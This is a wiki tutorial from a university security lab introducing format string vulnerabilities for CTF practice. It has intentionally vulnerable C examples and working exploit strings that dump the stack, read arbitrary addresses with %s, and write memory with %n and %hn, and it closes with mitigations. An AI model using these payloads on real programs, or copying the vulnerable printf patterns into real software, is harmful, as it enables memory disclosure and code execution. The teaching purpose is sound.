Difference between revisions of "Format String Bug Introduction"

From Embedded Lab Vienna for IoT & Security

Revision as of 12:48, 19 May 2020

Summary

This document gives an introduction to format string bugs. A Format String Bug occurs when the programmer passes a user-controlled buffer to a Format Function as its format string. The user input is then interpreted as formatting instructions by the application. An exploit can read from the stack and perform arbitrary writes on the stack and thereby change the program behavior. This can lead to program crashes (segmentation faults) and security compromises such as the disclosure of secrets in memory (information disclosure) or the execution of arbitrary commands.


Requirements

Binaries are tested on platform: Debian 4.9.210-1 (2020-01-20)

 git clone https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ccst
 cd ccst/format_string

All code examples discussed here can be found in the example folder. They are compiled for the 32-bit x86 architecture using gcc version 6.3.0 (posix).

 gcc example.c -m32 -o example

Exploits for the x64 architecture may differ.

Description of Format String Vulnerability

The Format Function is an ANSI C conversion function, such as `printf`, which converts a variable into a human-readable string representation. The Format String is the argument of the Format Function; it contains an ASCII string with text and Format Parameters, such as:

 printf ("Guess solution: %d\n", 42);

Here 42 is interpreted as a decimal number by the Format Function. The Format Parameter/Specifier %d,%s,%p,%u,.. defines the type of conversion function.

Format Parameter/Specifier Table

{| class="wikitable"
|-
! Parameter !! Output !! Passed as
|-
| %p || External representation of a pointer to void || Reference
|-
| %d || Decimal || Value
|-
| %c || Character || Value
|-
| %u || Unsigned decimal || Value
|-
| %x || Hexadecimal || Value
|-
| %s || String || Reference
|-
| %n || Writes the number of characters into a pointer || Reference
|}

In vulnerable code the user input is directly passed to the function printf(userinput) instead of a Format String including Format Parameter.

Vulnerable Format Functions Table

{| class="wikitable"
|-
! Format function !! Description
|-
| fprintf || Writes the formatted output to a file
|-
| printf || Outputs a formatted string
|-
| sprintf || Prints into a string
|-
| snprintf || Prints into a string, checking the length
|-
| vfprintf || Prints a va_arg structure to a file
|-
| vprintf || Prints a va_arg structure to stdout
|-
| vsprintf || Prints a va_arg structure to a string
|-
| vsnprintf || Prints a va_arg structure to a string, checking the length
|}

History

The Format String Bug has been publicly known since at least September 1999[1]; it gained major attention after the public release of exploit code against wu-ftpd 2.6.0 in June 2000[2].

Read From the Stack

Example - Read from the stack

The following program shows safe and vulnerable usage of a Format Function:


   #include  <stdio.h>
   void main(int argc, char **argv)
   {
       // This line is safe
       printf("%s\n", argv[1]);
   
       // This line is vulnerable
       printf(argv[1]);
   }


Execute with different arguments:

   ./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
   ./example "%08x.%08x.%08x.%08x.%08x%08x.%08x.%08x.%08x.%08x"
   ./example "%s"

With the first input, the Format Function interprets the command-line argument as a format string that expects 15 pointer arguments. Because no such arguments were passed, it prints the next 15 pointer-sized values from the stack, which means we are able to dump the stack.

What happens exactly?

  • Stack with correctly coded Format String

   printf("this is a %s, with a number %d, and address %08x", a, b, &c);

The stack grows toward lower addresses and is used in a LIFO manner; the arguments are pushed onto the stack in reverse order. The Format Function reads a, b and &c from the stack and converts them into the string that is sent to stdout. (Source of image: [3])

Safe.png

  • Stack with missing variables

printf(userinput) with the input string "this is a %s, with a number %d, and address %08x" evaluates to

   printf("this is a %s, with a number %d, and address %08x");

The variables a, b and &c are missing on the stack. (Source of image: [3])

Vulnstack.png

The Format Function reads the next values from the stack even though they were never passed as arguments. If the source code is available, a Format String vulnerability can be recognized by checking, for every Format Function call, whether a format string with the matching Format Specifiers is provided. If only a binary is available, test it by inserting Format Specifiers such as "%x %x %s" as input.

Read by Direct Stack Parameter Access

File example2.c

   # include  <stdio.h>
   # include <string.h>
   
   void vuln() {
       printf("What's your name? ");
       char name[200];
       gets(name);
       printf("Nice to meet you, ");
       printf(strcat(name, "!\n"));
   }
   void main(int argc, char **argv)
   {
       setvbuf(stdin, NULL, _IONBF, 0);
       setvbuf(stdout, NULL, _IONBF, 0);
       vuln();
   }

We can read an arbitrary argument from the stack with "%<some number>$x": to read the first argument on the stack we use %1$08x, for the second %2$08x, and so on. To get an idea of where we are reading, we can insert a recognizable marker followed by a series of specifiers:

   "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
   ./example2
   What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you,   
   AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!

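We can then determine the position of the input buffer on the stack by locating 41414141 in the output. In the run above it is the 7th value printed; in the run below, 44434241 is the 6th. The position depends on the build and environment, so count it on your own binary. The rest of this section assumes that the input buffer name is the 6th argument on the stack, which can be accessed with AAAA.%6$08x.

Caution - the x86 architecture stores data in little-endian byte order. Test this by inserting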

   ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   
   ./example2
   What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!

Our input ABCD... starts at the 6th argument on the stack, where it appears as 44434241 in little-endian byte order. This can be verified with ABCD.%6$08x.

Arbitrary Read

We would like to read data from a known memory address. The previous examples showed that we control the content of the Format String, which itself lies on the stack. We therefore need a Format Parameter that takes an address from the stack (passed by reference) and displays the memory at that address: %s. We place the address we want to read at the start of our input and arrange for the 6th item on the stack, which holds that address, to be consumed by %s and read as a string.

   address = 0x08480110
   address (encoded as 32 bit le string): "\x10\x01\x48\x08"
   printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");


(With this information you should be able to solve CH0_easyprintf)

Write the Stack %n

The `%n` Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack.

File: example3

```C
int n_chars = 0;
printf("Hello, World%n is ", &n_chars);
printf("%d bytes long.\n", n_chars);
```

In the first printf call in example3, the `%n` Format Parameter writes the number of bytes printed so far, the 12 bytes of `Hello, World`, into the variable `n_chars`.

`%n` can be used to write to a specified address:

```bash
"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
```

The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment.

```C
n_chars = 0;
printf("%10u%n ", 1, &n_chars);   // n_chars = 10
n_chars = 0;
printf("%150u%n ", 2, &n_chars);  // n_chars = 150
```

However, values such as addresses are 4 bytes long, and we do not want to overwrite neighboring areas on the stack. Therefore a technique that writes a single byte is applied several times. Let us have a closer look at what is happening, because writing just one byte may have side effects. An unsigned integer is stored in memory in 4 bytes in little-endian encoding, so a number like 0x0000014c is \x4c\x01\x00\x00 in memory.

File: example4

```C
unsigned char canary[5];
unsigned char foo[4];
memset (foo, '\x00', sizeof (foo));
/* 0 * before */ strcpy (canary, "AAAA");
/* 1 */ printf ("%16u%n", 7350, (int *) &foo[0]);   // foo[0] = 0x10
/* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]);   // foo[1] = 0x20
/* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]);   // foo[2] = 0x40
/* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]);  // foo[3] = 0x80
/* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]);
printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
```

In step 0, foo is initialized with four `\x00` bytes, and the canary 'AAAA', represented by `\x41\x41\x41\x41`, is stored in the next variable on the stack. After the four byte-wise write operations, foo contains 10204080 as expected, but 3 bytes of the canary were overwritten: `\x00\x00\x00\x41` = 00000041. Figure 1 illustrates the behavior of the write procedures.

Source:[4]

Multiple byte writes can also be performed in a single call when the written bytes are in ascending order.

File: example4

```C
strcpy (canary, "AAAA");
printf ("%16u%n%16u%n%32u%n%64u%n",
        1, (int *) &foo[0], 1, (int *) &foo[1],
        1, (int *) &foo[2], 1, (int *) &foo[3]);
printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]);
printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
```

The output is again foo: 10204080 and canary: 00000041.

Write Short %hn

Instead of writing each byte separately, we can write short integers using the `%hn` format specifier. The advantage of `%hn` is that it does not destroy data next to the targeted address, so it is the preferred method. Again we want to write 10204080 into foo.

First value of alignment: 0x2010 = 8208
Second value of alignment: 0x8040 - 0x2010 = 32832 - 8208 = 24624

File: example5

```
printf ("%.8208u%hn%.24624u%hn", 1, (short int *) &foo[0], 1, (short int *) &foo[2]);
```

Output: foo: 10204080 canary: 41414141


Test your skills with CH1_root_me2

Usage

  • Reading arbitrary locations (leak addresses or canaries)
  • Writing arbitrary locations
  • Executing arbitrary code (Overwrite Return, .GOT addresses)

Protection

  • Programmers should use safe versions

Never pass user input directly to a Format Function without a format specifier.

```
printf("%s", userinputbuffer);
snprintf(buf, sizeof buf, "%s", userinputbuffer);
```

  • FormatGuard: Automatic Protection From printf Format String Vulnerabilities [3]


Sources

Interesting CTF writeups

References

  1. Tymm Twillman,Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
  2. tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].
  3. Saif El Sherei, Format String Exploitation-Tutorial, https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf [accessed 05-21-2020].
  4. scut / team teso, Exploiting Format String Vulnerabilities, version 1.2, 09-01-2001, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf [accessed 05-21-2020].
